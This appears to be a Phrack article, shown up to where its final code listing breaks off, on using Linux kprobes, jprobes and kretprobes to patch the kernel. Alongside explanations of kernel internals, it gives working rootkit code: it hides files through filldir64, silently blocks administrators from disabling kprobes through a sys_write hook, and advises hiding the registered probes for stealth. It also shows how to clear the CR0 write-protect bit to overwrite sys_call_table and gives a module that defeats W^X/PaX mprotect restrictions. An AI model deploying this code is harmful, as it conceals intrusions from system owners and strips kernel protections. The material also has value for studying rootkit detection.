|
==Phrack Inc.== Volume 0x0e, Issue 0x43, Phile #0x06 of 0x10 |=-----------------------------------------------------------------------=| |=--------------=[ Kernel instrumentation using kprobes ]=---------------=| |=-----------------------------------------------------------------------=| |=--------------------------=[ by ElfMaster ]=---------------------------=| |=----------------------=[ elfmaster@phrack.org ]=-----------------------=| |=-----------------------------------------------------------------------=| 1 - Introduction 1.1 - Why write it? 1.2 - About kprobes 1.3 - Jprobe example 1.4 - Kretprobe example & Return probe patching technique 2 - Kprobes implementation 2.1 - Kprobe implementation 2.2 - Jprobe implementation 2.3 - File hiding with jprobes/kretprobes and modifying kernel .text 2.4 - Kretprobe implementation 2.5 - A quick stop into modifying read-only kernel segments 2.6 - An idea for a kretprobe implementation for hackers 3 - Patch to unpatch W^X (mprotect/mmap restrictions) 4 - Notes on rootkit detection for kprobes 5 - Summing it all up. 6 - Greetz 7 - References and citations 8 - Code ---[ 1 - Introduction ----[ 1.1 - Why write it? I will preface this by saying that kprobes can be used for anti-security patching of the kernel. I would also like to point out that kprobes are not the most efficient way to patch the kernel or write rootkits and backdoors because they simply require more work -- extra innovation. So why write this? Because... we are hackers. Hackers should be aware of any and all resources available to them -- some more auspicious than others -- Nonetheless, kprobes are a sweet deal when you consider that they are a native kernel API that are ripe for abuse, even without exceeding their scope. Due to limitations discussed later on, kprobes require some extra innovation when determining how to perform certain tasks such as file hiding and applying other interesting patches that could subvert or even harden the kernels integrity. ----[ 1.2 - About kprobes It is with no doubt that the best introduction to kprobes is in the Linux kernel source documentation that contains kprobes.txt. Make sure to read that when you get a chance. Kprobes are a debugging API native to the Linux kernel that is based on the processors debug registers -- whatever the processor may be. We are going to assume x86, which at this time has the most kprobe code developed. --From kprobes.txt -- Kprobes enables you to dynamically break into any kernel routine and collect debugging and performance information non-disruptively. You can trap at almost any kernel code address, specifying a handler routine to be invoked when the breakpoint is hit. There are currently three types of probes: kprobes, jprobes, and kretprobes (also called return probes). A kprobe can be inserted on virtually any instruction in the kernel. A jprobe is inserted at the entry to a kernel function, and provides convenient access to the function's arguments. A return probe fires when a specified function returns. -- Based on this definition one can imagine that this kprobes interface may be used to instrument the kernel in some useful ways, both for security and anti-security; That is what this paper is about. In the recent past I implemented some relatively powerful and complex security patches using kprobes. That is not to say that other patching methods are not still useful, but occasionally one may run into issues using traditional methods such as kernel function trampolines which are not SMP safe due to the non-atomic nature of swapping code in and out. kprobes are a native interface which is nice, but they still present some challenges due to limitations we discuss throughout the paper. Kprobes can be used to patch the kernel in some places, but cannot be used for everything. This a treatise that can shed some light on when and where kprobes can be used to modify the behavior of the kernel. Sometimes they must be used in conjunction with another patching method. Before we move on I wanted to point out the following few facts: kprobes show up as being registered here: /sys/kernel/debug/kprobes/list And can be enabled or disabled by writing a 0 or a 1 here: /sys/kernel/debug/kprobes/enabled The kprobe source code is located in the following locations: /usr/src/linux/kernel/kprobes.c /usr/src/linux/arch/x86/kernel/kprobes.c Keep in mind that jprobes/kretprobes are 100% based on kprobes and disabling kprobes like shown above will prevent any kretprobe/jprobe code from working as well. Moving on... ----[ 1.3 - Jprobe example In this paper we will be working primarily with jprobes and kretprobes. As shown in the kprobe documentation already, there are several functions available for registering and unregistering these probes. Lets pretend for a moment that we are interested in sys_mprotect, and we want to inspect any calls to it, and the args that are being passed. For this we could register a jprobe for sys_mprotect. The following code outlines the general idea here. And consider that because we are setting a jprobe on a syscall, we need to either declare our jprobe handler using 'asmlinkage' magic, otherwise we must get our args directly from the registers. In our example I will get the args directly from the registers just to show how to obtain the registers for the current task. -- jprobe example 1 -- NOTE: The jprobe data types will be explained in detail in 2.2 [Jprobe implementation] int n_sys_mprotect(unsigned long start, size_t len, long prot) { struct pt_regs *regs = task_pt_regs(current); start = regs->bx; len = regs->cx; prot = regs->dx; printk("start: 0x%lx len: %u prot: 0x%lx\n", start, len, prot); jprobe_return(); return 0; } /* The following entry in struct jprobe is 'void *entry' and simply points to the jprobe function handler that will be executing when the probe is hit on the function entry point. */ static struct jprobe mprotect_jprobe = { .entry = (kprobe_opcode_t *)n_sys_mprotect // function entry }; static int __init jprobe_init(void) { /* kp.addr is kprobe_opcode_t *addr; from struct kprobe and */ /* points to the probe point where the trap will occur. In */ /* our case we are probing sys_mprotect */ mprotect_jprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect"); if ((ret = register_jprobe(&mprotect_jprobe)) < 0) { printk("register_jprobe failed for sys_mprotect\n"); return -1; } return 0; } int init_module(void) { jprobe_init(); return 0; } void exit_module(void) { unregister_jprobe(&mprotect_jprobe); } In the above code, we register a jprobe for sys_mprotect. This means that a breakpoint instruction is placed on the entry point of the function, and as soon as it gets called a trap occurs and control is passed to our n_sys_mprotect() jprobe handler. From this point we can analyze data such as the arguments passed either in registers or on the stack, as well as any kernel data structures. We can also modify kernel data structures, which is primarily what we rely on for our patches using kprobes. Any attempts to modify the stack arguments or registers will be overriden as soon as our handler function returns -- this is because kprobes saves the register state and stack args prior to calling the handler, and restores these values upon the jprobe_return(), at which point the real syscall or function will execute and do its thing. We will get into much more detail on this topic and how to actually modify stack arguments later on. ----[ 1.4 - Kretprobe example and return probe patching technique Moving on to kretprobes (Also known as return probes). Without kretprobes it wouldn't be as easily possible to patch the kernel using kprobes, this is because a kernel function that we set a jprobe on might re-modify a kernel data structure that we modify, as soon as our jprobe handler returns. If we apply a kretprobe into the situation we can modify that kernel data structure after the real kernel function returns. Here is an example... Lets say we want to modify the kernel data structure 'kstruct->x' (which is ficticious). We want to modify it, but do not know what value we want to apply to it until 'function_A' executes, but as soon as the real 'function_A' executes after our jprobe handler, it sets the value 'kstruct->x' to something. This is where kretprobes come into play. This is the approach we take, which we can call the 'return probe patching' technique. 1. [jprobe handler for function_A] -> Determines the value that we want to set on kstruct->x 2. [function_A] -> Sets the value of kstruct->x to some value. 3. [kretprobe handler for function_A] -> Sets the value of kstruct->x to value determined by jprobe handler. So as you can see, with kretprobes we end up being able to set the final verdict on a value. Here is a quick example of registering a kretprobe. We will use sys_mprotect for this example as well. The kretprobe data types will be explained in the section 2.4 [kretprobes implementation]. static int mprotect_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs) { printk("Original return address: 0x%lx\n", (unsigned long)ri->ret_addr); return 0; } static struct kretprobe mprotect_kretprobe = { .handler = mprotect_ret_handler, // return probe handler .maxactive = NR_CPUS // max number of kretprobe instances }; int init_module(void) { mprotect_kretprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect"); register_kretprobe(&mprotect_kretprobe); } As you can see I utilize kallsyms_lookup_name(), but interestingly a probe can be set on virtually any instruction within the kernel, whatever means you use to get that location is up to you (I.E System.map). So as you can see, the code is straight forward. From an internal point of view-- by the time sys_mprotect returns, the address at the top of the stack (the ret address) has been modified to point to a function called kretprobe_trampoline() which in turn sets things up to call our mprotect_ret_handler() function where we can inspect and modify kernel data. No point in modifying the registers because they were all saved on the stack and will be reset as soon as our handler returns. More on this in the next section. The kretprobe trampoline function will be explored in detail in 2.4 [Kretprobe implementation]. ---[ 2 - Kprobes implementation ----[ 2.1 - Kprobe implementation Firstly I want to make sure we are on the same page about what a basic kprobe is, and the general idea of how it works. -- Taken from kprobes.txt: When a kprobe is registered, Kprobes makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64). When a CPU hits the breakpoint instruction, a trap occurs, the CPU's registers are saved, and control passes to Kprobes via the notifier_call_chain mechanism. Kprobes executes the "pre_handler" associated with the kprobe, passing the handler the addresses of the kprobe struct and the saved registers. It would be simpler to single-step the actual instruction in place, but then Kprobes would have to temporarily remove the breakpoint instruction. This would open a small time window when another CPU could sail right past the probepoint. After the instruction is single-stepped, Kprobes executes the "post_handler," if any, that is associated with the kprobe. Execution then continues with the instruction following the probepoint. Next, Kprobes single-steps its copy of the probed instruction. -- So to clarify, when registering a typical kprobe a pre_handler should always be assigned so that you can inspect data or do whatever you want during that point. A post handler may or may not be assigned. Since we are primarily using jprobes and kretprobes which are extensions of the kprobe interface, I have chosen to primarily discuss their implementation more so than a plain kprobe. All you need to know for now is that registering a basic kprobe inserts a breakpoint instruction on the desired location, and executes a pre and a post handler that you assign. As you will see in the jprobe and kretprobe implementations which are implemented using a basic kprobe with a pre and post handler, the pre and post handlers point to special kernel functions [/usr/src/linux/arch/x86/kernel/kprobes.c] that act as a sort of prologue/epilogue for the actual handler that executes the instructions. More will be revealed in the following sections. ----[ 2.2 - Jprobe implementation If we are aware of the internal implementation of jprobes and kretprobes then we can utilize them better, and we could even patch the interface itself to act more like we want it, but this defeats the purpose of this paper which aims at patching the kernel using the kprobes interface as it is, although we will explore some external modifications of kprobes later on. Firstly take a look at the following struct: struct jprobe { struct kprobe kp; void *entry; /* probe handling code to jump to */ }; When we call register_jprobe() it in turn calls register_jprobes(&jp, 1). register_jprobes() is all about setting up the jprobe pre/post and entry handler. -- snippet from register_jprobes() in /usr/src/linux/kernel/kprobes.c -- /* See how jprobes utilizes kprobes? It uses the */ /* pre/post handler */ jp->kp.pre_handler = setjmp_pre_handler; jp->kp.break_handler = longjmp_break_handler; ret = register_kprobe(&jp->kp); -- The pre_handler is called before your function/entry handler and is responsible for saving the contents of the stack, the registers, and sets the eip. In normal circumstances the developer has no control over the pre/post handler for jprobes because the kprobe pre and post handler entries within struct kprobe do not point to your own custom handlers, but instead to specialized handlers specifically for the jprobe prologue/epilogue. /* Called before addr is executed. */ kprobe_pre_handler_t pre_handler; /* Called after addr is executed, unless... */ kprobe_post_handler_t post_handler; You could say that the execution of a jprobe looks like this: 1. [jprobe pre_handler] Backup stack and register state 2. [jprobe function handler] Do elite modifications to kernel 3. [jprobe post_handler] Restore original stack and registers. Lets take a peek at the pre_handler which backs up the stack and registers. int __kprobes setjmp_pre_handler(struct kprobe *p, struct pt_regs *regs) { struct jprobe *jp = container_of(p, struct jprobe, kp); unsigned long addr; struct kprobe_ctlblk *kcb = get_kprobe_ctlblk(); kcb->jprobe_saved_regs = *regs; kcb->jprobe_saved_sp = stack_addr(regs); addr = (unsigned long)(kcb->jprobe_saved_sp); /* * As Linus pointed out, gcc assumes that the callee * owns the argument space and could overwrite it, e.g. * tailcall optimization. So, to be absolutely safe * we also save and restore enough stack bytes to cover * the argument area. */ memcpy(kcb->jprobes_stack, (kprobe_opcode_t *)addr, MIN_STACK_SIZE(addr)); regs->flags &= ~X86_EFLAGS_IF; trace_hardirqs_off(); regs->ip = (unsigned long)(jp->entry); return 1; } Pay close attention to the code comment above; Like with Chuck Noris... if Linus says it, then it MUST be true! As you can see, the function gets the current stack location using the stack_addr() macro, and then memcpy's it over to kcb->jprobes_stack which is a backup of the stack to be restored in the post handler. The stack being restored prior to the real function being called does impose some obvious restrictions, but that does not mean that we can't manipulate the pointer values that are passed on the stack which is something we take advantage of in section 2.3 (File hiding). After the jprobe handler is finished, the jprobe post handler is called -- here is the code. int __kprobes longjmp_break_handler(struct kprobe *p, struct pt_regs *regs) { struct kprobe_ctlblk *kcb = get_kprobe_ctlblk(); u8 *addr = (u8 *) (regs->ip - 1); struct jprobe *jp = container_of(p, struct jprobe, kp); if ((addr > (u8 *) jprobe_return) && (addr < (u8 *) jprobe_return_end)) { if (stack_addr(regs) != kcb->jprobe_saved_sp) { struct pt_regs *saved_regs = &kcb->jprobe_saved_regs; printk(KERN_ERR "current sp %p does not match saved sp %p\n", stack_addr(regs), kcb->jprobe_saved_sp); printk(KERN_ERR "Saved registers for jprobe %p\n", jp); show_registers(saved_regs); printk(KERN_ERR "Current registers\n"); show_registers(regs); BUG(); } *regs = kcb->jprobe_saved_regs; memcpy((kprobe_opcode_t *)(kcb->jprobe_saved_sp), kcb->jprobes_stack, MIN_STACK_SIZE(kcb->jprobe_saved_sp)); preempt_enable_no_resched(); return 1; } return 0; } The code primarily restores the stack and re-enables preemption; probe handlers are run with preemption disabled. ----[ 2.3 - File hiding using jprobes/kretprobes Lets consider a simple file hiding approach that consists using the dirent->d_name pointer in filldir64(). char *hidden_files[] = { #define HIDDEN_FILES_MAX 3 "test1", "test2", "test3" }; struct getdents_callback64 { struct linux_dirent64 __user * current_dir; struct linux_dirent64 __user * previous; int count; int error; }; /* Global data for kretprobe to act on */ static struct global_dentry_info { unsigned long d_name_ptr; int bypass; } g_dentry; /* Our jprobe handler that globally saves the pointer value of dirent->d_name */ /* so that our kretprobe can modify that location */ static int j_filldir64(void * __buf, const char * name, int namlen, loff_t offset, u64 ino, unsigned int d_type) { int found_hidden_file, i; struct linux_dirent64 __user *dirent; struct getdents_callback64 * buf = (struct getdents_callback64 *) __buf; dirent = buf->current_dir; int reclen = ROUND_UP64(NAME_OFFSET(dirent) + namlen + 1); /* Initialize custom stuff */ g_dentry.bypass = 0; found_hidden_file = 0; for (i = 0; i < HIDDEN_FILES_MAX; i++) if (strcmp(hidden_files[i], name) == 0) found_hidden_file++; if (!found_hidden_file) goto end; /* Create pointer to where we need to modify in dirent */ /* since someone is trying to view a file we want hidden */ g_dentry.d_name_ptr = (unsigned long)(unsigned char *)dirent->d_name; g_dentry.bypass++; // note that we want to bypass viewing this file end: jprobe_return(); return 0; } /* Our kretprobe handler, which we use to nullify the filename */ /* Remember the 'return probe technique'? Well this is it. */ static int filldir64_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs) { char *ptr, null = 0; /* Someone is looking at one of our hidden files */ if (g_dentry.bypass) { /* Lets nullify the filename so it simply is invisible */ ptr = (char *)g_dentry.d_name_ptr; copy_to_user((char *)ptr, &null, sizeof(char)); } } The code above is quite adept at hiding files based on getdents64 being called but unfortunately 'ls' from GNU coreutils will call lstat64 for every d_name found, and if some of the d_names start with a null byte then we will see an error returned by lstat saying "Cannot access : : file not found". So if we are hiding 3 files, then we will see that error message 3 times prior to the directory listing (which will not show the hidden files). One of the primary limitations of kprobe patching is that we cannot modify the return value of a function; the closest we can get is setting up a return probe to modify data that the function may have operated on. There are some indirect methods of altering the return value at times, but after following the code path for lstat64 I found no way to remedy the issue using kprobes. Instead I found the not-so-elegant approach of redirecting the stderr to /dev/null by setting a jprobe and a return probe on sys_write. Additionally, while modifying sys_write, we might as well redirect any attempts to disable kprobes to /dev/null as well. A super user can simply 'echo 0 > /sys/kernel/debug/kprobes/enabled' to disable the kprobes interface (We don't want this). One of the parameters we will pass to insmod when installing our LKM will be the inode of the 'enabled' /sys entry. Below is the code for our modified sys_write. asmlinkage static int j_sys_write(int fd, void *buf, unsigned int len) { char *s = (char *)buf; char null = '\0'; char devnull[] = "/dev/null"; struct file *file; struct dentry *dentry = NULL; unsigned int ino; int ret; char comm[255]; stream_redirect = 0; // do we redirect to /dev/null? /* Make sure this is an ls program */ /* otherwise we'd prevent other programs */ /* From being able to send 'cannot access' */ /* in their stderr stream, possibly */ get_task_comm(comm, current); if (strcmp(comm, "ls") != 0) goto out; /* check to see if this is an ls stat complaint, or ls -l weirdness */ /* There are two separate calls to sys_write hence two strstr checks */ if (strstr(s, "cannot access") || strstr(s, "ls:")) { printk("Going to redirect\n"); goto redirect; } /* Check to see if they are trying to disable kprobes */ /* with 'echo 0 > /sys/kernel/debug/kprobes/enabled' */ file = fget(fd); if (!file) goto out; dentry = dget(file->f_dentry); if (!dentry) goto out; ino = dentry->d_inode->i_ino; dput(dentry); fput(file); if (ino != enabled_ino) goto out; redirect: /* If we made it here, then we are doing a redirect to /dev/null */ stream_redirect++; mm_segment_t o_fs = get_fs(); set_fs(KERNEL_DS); n_sys_close(fd); fd = n_sys_open(devnull, O_RDWR, 0); set_fs(o_fs); global_fd = fd; out: jprobe_return(); return 0; } /* Here is the return handler to close the fd to /dev/null. */ static int sys_write_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs) { if (stream_redirect) { n_sys_close(global_fd); stream_redirect = 0; } return 0; } We close the existing file descriptor and open a new one that will use the same fd number. This redirection of stderr to /dev/null is only for the current process. To understand it a bit more we can follow the code path of do_sys_open(), I've added some extra comments: long do_sys_open(int dfd, const char __user *filename, int flags, int mode) { char *tmp = getname(filename); int fd = PTR_ERR(tmp); if (!IS_ERR(tmp)) { fd = get_unused_fd_flags(flags); if (fd >= 0) { struct file *f = do_filp_open(dfd, tmp, flags, mode, 0); if (IS_ERR(f)) { put_unused_fd(fd); fd = PTR_ERR(f); } else { /* Notice fsnotify_open() */ fsnotify_open(f->f_path.dentry); /* Associate fd with /dev/null */ fd_install(fd, f); trace_do_sys_open(tmp, flags, mode); } } putname(tmp); } return fd; } The new file descriptor is associated with its new file (struct files_struct *) for the current task using fd_install(). void fd_install(unsigned int fd, struct file *file) { struct files_struct *files = current->files; // <-- notice here struct fdtable *fdt; spin_lock(&files->file_lock); fdt = files_fdtable(files); // <-- notice here BUG_ON(fdt->fd[fd] != NULL); rcu_assign_pointer(fdt->fd[fd], file); // <-- notice here spin_unlock(&files->file_lock); } One important note to the reader is, /sys/kernel/debug/kprobes/list the file which shows any registered kprobes. Simply use a redirect technique like the one we used above to track open's to that file and redirect any writes to stdout to /dev/null if the list contains a probe that you have registered. Very trivial, and absolutely necessary to maintain a stealth presence. As the topic of rootkits has become trite ... I would like to introduce some other kprobe examples. Firstly let us discuss the Kretprobe implementation in detail. It will give some more insight into the limitations of kprobes and also expand your mind on how the kprobe implementation may be modified -- which is not covered in this paper. ----[ 2.4 - Kretprobe implementation The kretprobe implementation is especially interesting. Primarily because it is an innovative and nicely engineered chunk of code. Here is how it works. -- From the kprobes.txt -- When you call register_kretprobe(), Kprobes establishes a kprobe at the entry to the function. When the probed function is called and this probe is hit, Kprobes saves a copy of the return address, and replaces the return address with the address of a "trampoline." The trampoline is an arbitrary piece of code -- typically just a nop instruction. At boot time, Kprobes registers a kprobe at the trampoline. The kretprobe implementation is really just a creative way of using kprobes by registering them and assigning the trap handlers functions that deal with modifying the return address. -- From /usr/src/linux/kernel/kprobes.c -- int __kprobes register_kretprobe(struct kretprobe *rp) { int ret = 0; struct kretprobe_instance *inst; int i; void *addr; ... <code> ... rp->kp.pre_handler = pre_handler_kretprobe; rp->kp.post_handler = NULL; rp->kp.fault_handler = NULL; rp->kp.break_handler = NULL; ... <code> ... } NOTE: Notice the rp->kp.pre_handler -- kp is struct kprobe and the pre_handler is assigned pre_handler_kretprobe. So when the return probe is hit, pre_handler_kretprobe() will call arch_prepare_kretprobe() which saves the original return address and inserts the new one: void __kprobes arch_prepare_kretprobe(struct kretprobe_instance *ri, struct pt_regs *regs) { unsigned long *sara = stack_addr(regs); ri->ret_addr = (kprobe_opcode_t *) *sara; /* Replace the return addr with trampoline addr */ *sara = (unsigned long) &kretprobe_trampoline; } Notice the last line which sets the return address to the trampoline. The trampoline is actually defined in an assembly stub, which for x86 looks like this: asm volatile ( ".global kretprobe_trampoline\n" "kretprobe_trampoline: \n" * Skip cs, ip, orig_ax and gs. * trampoline_handler() will plug in these values */ " subl $16, %esp\n" " pushl %fs\n" " pushl %es\n" " pushl %ds\n" " pushl %eax\n" " pushl %ebp\n" " pushl %edi\n" " pushl %esi\n" " pushl %edx\n" " pushl %ecx\n" " pushl %ebx\n" " movl %esp, %eax\n" " call trampoline_handler\n" /* Move flags to cs */ " movl 56(%esp), %edx\n" " movl %edx, 52(%esp)\n" /* Replace saved flags with true return address. */ " movl %eax, 56(%esp)\n" " popl %ebx\n" " popl %ecx\n" " popl %edx\n" " popl %esi\n" " popl %edi\n" " popl %ebp\n" " popl %eax\n" /* Skip ds, es, fs, gs, orig_ax and ip */ " addl $24, %esp\n" " popf\n" #endif " ret\n"); } After the register state is backed up on the stack the stub calls trampoline_handler() which essentially executes any return probe handlers associated with the kretprobe for the given function. Looking at the actual function gives some more insight. static __used __kprobes void *trampoline_handler(struct pt_regs *regs) { struct kretprobe_instance *ri = NULL; struct hlist_head *head, empty_rp; struct hlist_node *node, *tmp; unsigned long flags, orig_ret_address = 0; unsigned long trampoline_address = (unsigned long)&kretprobe_trampoline; INIT_HLIST_HEAD(&empty_rp); kretprobe_hash_lock(current, &head, &flags); /* fixup registers */ #ifdef CONFIG_X86_64 regs->cs = __KERNEL_CS; #else regs->cs = __KERNEL_CS | get_kernel_rpl(); regs->gs = 0; #endif regs->ip = trampoline_address; regs->orig_ax = ~0UL; /* * It is possible to have multiple instances associated with a * given * task either because multiple functions in the call path have * return probes installed on them, and/or more than one * return probe was registered for a target function. * * We can handle this because: * - instances are always pushed into the head of the list * - when multiple return probes are registered for the same * function, the (chronologically) first instance's ret_addr * will be the real return address, and all the rest will * point to kretprobe_trampoline. */ hlist_for_each_entry_safe(ri, node, tmp, head, hlist) { if (ri->task != current) /* another task is sharing our hash bucket */ continue; if (ri->rp && ri->rp->handler) { __get_cpu_var(current_kprobe) = &ri->rp->kp; get_kprobe_ctlblk()->kprobe_status = KPROBE_HIT_ACTIVE; ri->rp->handler(ri, regs); __get_cpu_var(current_kprobe) = NULL; } orig_ret_address = (unsigned long)ri->ret_addr; recycle_rp_inst(ri, &empty_rp); if (orig_ret_address != trampoline_address) /* * This is the real return address. Any other * instances associated with this task are for * other calls deeper on the call stack */ break; } kretprobe_assert(ri, orig_ret_address, trampoline_address); kretprobe_hash_unlock(current, &flags); hlist_for_each_entry_safe(ri, node, tmp, &empty_rp, hlist) { hlist_del(&ri->hlist); kfree(ri); } return (void *)orig_ret_address; } The original return address value is returned, and then the kretprobe_trampoline stub copies it onto the stack at the right location. At which point all of the saved registers are pop'd and restored--resulting in returning to the original calling function with the original return value. I suppose it doesn't take an over active imagination to see that the kretprobe_trampoline stub code can be modified to return a different value. This could be done in several ways, however it would exceed the scope of hacking purely with kprobes. The arch_prepare_kretprobe() function would have to be patched (And it cannot be patched using a kprobe sadly) this is because any functions with a __kprobe in the prototype cannot be patched using kprobe hooks themselves. -- A simple patch within arch_prepare_kretprobe() *sara = (unsigned long)&kretprobe_trampoline; Could be changed to: *sara = (unsigned long)&custom_asm_stub; The problem is that arch_prepare_kretprobe() would have to be modified using a technique alternate to kprobes, which is of course easy enough but exceeds this papers scope. If you are interested in doing this the next section will give you a trick that will be necessary in doing so. ----[ 2.5 - A quick stop into modifying read-only kernel segments If you do feel interested in hijack arch_prepare_kretprobe() using a function trampoline, do remember that modern intel CPU's have the WRITE_PROTECT bit (cr0.wp) which prevents modifications to read-only segments, so anytime you want to modify any data structure that resides in .rodata you will need to use the function I provide below to modify them. The following types of data structures often exist in the kernels text segment: 1. void **sys_call_table 2. const struct file_operations <fs_fops_name> 3. const struct vm_ops <vma_vmops_name> 4. kernel functions Data structures defined as 'const' will go into the .rodata section which is at the end of the text segment, and the kernel code itself generally exist in the .text section of the text segment. Attempting writes to these locations will cause kernel freezes/panics/oops. Some people modify the page table entry data for read-only pages they want to modify, but the following functions I have provided are much simpler, and an example will be provided below. /* FUNCTION TO DISABLE WRITE PROTECT BIT IN CPU */ static void disable_wp(void) { unsigned int cr0_value; asm volatile ("movl %%cr0, %0" : "=r" (cr0_value)); /* Disable WP */ cr0_value &= ~(1 << 16); asm volatile ("movl %0, %%cr0" :: "r" (cr0_value)); } /* FUNCTION TO RE-ENABLE WRITE PROTECT BIT IN CPU */ static void enable_wp(void) { unsigned int cr0_value; asm volatile ("movl %%cr0, %0" : "=r" (cr0_value)); /* Enable WP */ cr0_value |= (1 << 16); asm volatile ("movl %0, %%cr0" :: "r" (cr0_value)); } So if you wanted to modify a kernel function pointer that exists within the text segment (If it is declared const) -- I.E the sys_call_table: disable_wp(); sys_call_table[__NR_write] = (void *)n_sys_write; enable_wp(); Or assuming you have a function that hijacks arch_prepare_kretprobe() using the method discussed here [3] disable_wp(); hijack_arch_prepare_kretprobe(); enable_wp(); You get the idea. But since we've fallen a bit off track lets move into the next section which is actually more relative to the paper. ----[ 2.6 - An idea for a kretprobe implementation for hackers The primary restriction in patching the kernels should be obvious by now. We CANNOT modify the return value in return probes (kretprobes). If someone felt so inclined, they could (in an LKM) implement something very similar to the kretprobe implementation. This would allow us to instrument the kernel using kprobes and modify the return value -- therefore easily patching functions like filldir64 which would allow us to simply use our special kretprobe implementation to 'return 0' if the 'char *d_name' matched a file we wanted to hide. If the reader studies /usr/src/linux/kernel/kprobes.c after reading the above section on kretprobe implementation, it becomes apparent that a more flexible kretprobe implementation could be designed. This is hardly non-trivial if the reader followed this paper in its entirety. I simply did not have enough time to design this feature -- a kretprobe for hackers that allows control of the return value. Lets call this feature 'rpe' (Return probe elite) the BASIC schematics would look like: int register_rpe(struct kretprobe *rp) { ... <code> ... rp->kp.pre_handler = pre_handler_rpe; ... <code> ... } static int pre_handler_rpe(struct kprobe *p, struct pt_regs *regs) { arch_prepare_rpe(regs); } void arch_prepare_rpe(struct pt_regs *regs) { unsigned long *ret = stack_addr(regs); ret_addr = (kprobe_opcode_t *) *sara; /* Replace the return addr with trampoline addr */ *ret = (unsigned long) &rpe_trampoline; } rpe_trampoline could be either an asm stub or an actual function -- either way you would want to backup the registers before calling your handler that does what you want -- to process data and ultimately return whatever value you want For instance: __asm__ ("movl $val, %eax\n" "push $ret_addr\n" "ret"); Since I did not provide an implementation for a more flexible kretprobe, the reader may be interested in doing so. Once I get an opportunity I intend on writing an LKM patch for one and releasing it. ---[ 3 - Patch to unpatch W^X (mprotect/mmap restrictions) Lets move on to a couple of other patches using the existing kprobe features to show some usefulness other than a file hiding mechanism. These two patches will aim at disabling the W^X feature that is enabled in kernels -- PaX for instance calls this mprotect restrictions. W^X is to say that an mmap segment cannot be created or modified to be both write+execute. The patches below give us two benefits: 1. On systems with the NX (no_exec_pages) bit set, we will be able to do things like mark the data segment as executable and inject code there for execution using ptrace. 2. Many ELF protectors (Burneye, Shiva, Elfcrypt, etc.) store the encrypted executable in the text segment of the stub/loading code and to decrypt part of a programs own text, would be considered self modifying code -- W^X prevents this -- so with our Anti-W^X patch we can use our ELF Protectors, and make segments such as the stack and data segment, once again, executable on systems with the NX bit set where mprotect/mmap restrictions really make a difference. An important note is that due to the design nature of the following patch, we cannot change the return values; so mprotect and mmap will both give a return value that says they failed-- don't exit based on error checking because your write+execute mmap and mprotect attempts actually succeed. To test you can look at /proc/pid/maps of the given process. -- tested on 2.6.18 -- On modern systems simply change regs->eax to regs->ax in the two necessary spots. Also exporting the module license to GPL is not necessary to use kprobes on modern systems. #include <linux/kernel.h> #include <linux/module.h> #include <linux/kprobes.h> #include <linux/mm.h> #include <linux/fs.h> #include <linux/file.h> #define PROT_READ 0x1 /* Page can be read. */ #define PROT_WRITE 0x2 /* Page can be written. */ #define PROT_EXEC 0x4 /* Page can be executed. */ #define PROT_NONE 0x0 /* Page can not be accessed. */ #define MAP_FIXED 0x10 #define MAP_ANONYMOUS 0x20 /* don't use a file */ #define MAP_GROWSDOWN 0x0100 /* stack-like segment */ #define MAP_DENYWRITE 0x0800 /* ETXTBSY */ #define MAP_EXECUTABLE 0x1000 /* mark it as an executable */ /* * It is preferable to write a script that gets * kallsyms_lookup_name() from System.map and then * passes it as a module parameter, but in this example * we just look it up and assign it our selves, so * make sure to change the address. */ unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len, unsigned long pgoff, unsigned long flags); static struct { int assign_wx; unsigned long start; size_t len; long prot; } mprotect; MODULE_LICENSE("GPL"); asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot) { struct vm_area_struct *vma = current->mm->mmap; mprotect.assign_wx = 0; mprotect.start = start; mprotect.prot = prot; /* This doesn't concern us */ if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE)) goto out; down_write(¤t->mm->mmap_sem); /* Get vma for start memory area */ vma = find_vma(current->mm, start); if (!vma) goto free_sem; if (prot & (PROT_WRITE|PROT_EXEC)) { mprotect.assign_wx++; goto free_sem; } if (prot & PROT_WRITE) { mprotect.assign_wx++; goto free_sem; } if (prot & PROT_EXEC) { mprotect.assign_wx++; goto free_sem; } free_sem: up_write(¤t->mm->mmap_sem); out: jprobe_return(); return 0; } /* before the following function is executed, a W^X patch such as PaX mprotect/mmap restrictions, will have code such as: if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC) vm_flags &= ~(VM_EXEC | VM_MAYEXEC); else vm_flags &= ~(VM_WRITE | VM_MAYWRITE); But our return probe gets the last say in the matter. mprotect will return like it failed (With a positive value) but the VMA's or memory maps will be both write+execute, just make sure that you don't error checking then exit if mprotect or mmap fail because they will return failed values. */ static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs) { struct vm_area_struct *vma; if (!mprotect.assign_wx) goto out; down_write(¤t->mm->mmap_sem); /* Get vma for start memory area */ vma = find_vma(current->mm, mprotect.start); if (!vma) goto sem_out; if (mprotect.prot & PROT_EXEC) { vma->vm_flags |= VM_MAYEXEC; vma->vm_flags |= VM_EXEC; } if (mprotect.prot & PROT_WRITE) { vma->vm_flags |= VM_MAYWRITE; vma->vm_flags |= VM_WRITE; } sem_out: up_write(¤t->mm->mmap_sem); out: return 0; } struct { unsigned long addr; #define MMAP_CLEAN 0 #define MMAP_DIRTY 1 int mmap_prot_state; unsigned int len; } do_mmap_data; /* Return probe code for sys_mmap2 */ static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs) { struct vm_area_struct *vma = current->mm->mmap; /* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */ if (do_mmap_data.addr - regs->eax == do_mmap_data.len) do_mmap_data.addr = regs->eax; else goto out; // pretty unlikely switch(do_mmap_data.mmap_prot_state) { case MMAP_CLEAN: break; case MMAP_DIRTY: // lets undo the work of the W^X patch :) down_write(¤t->mm->mmap_sem); vma = find_vma(current->mm, do_mmap_data.addr); if (!vma) break; printk("Found vma's and setting all writes and exec possibilities\n"); vma->vm_flags |= (VM_EXEC | 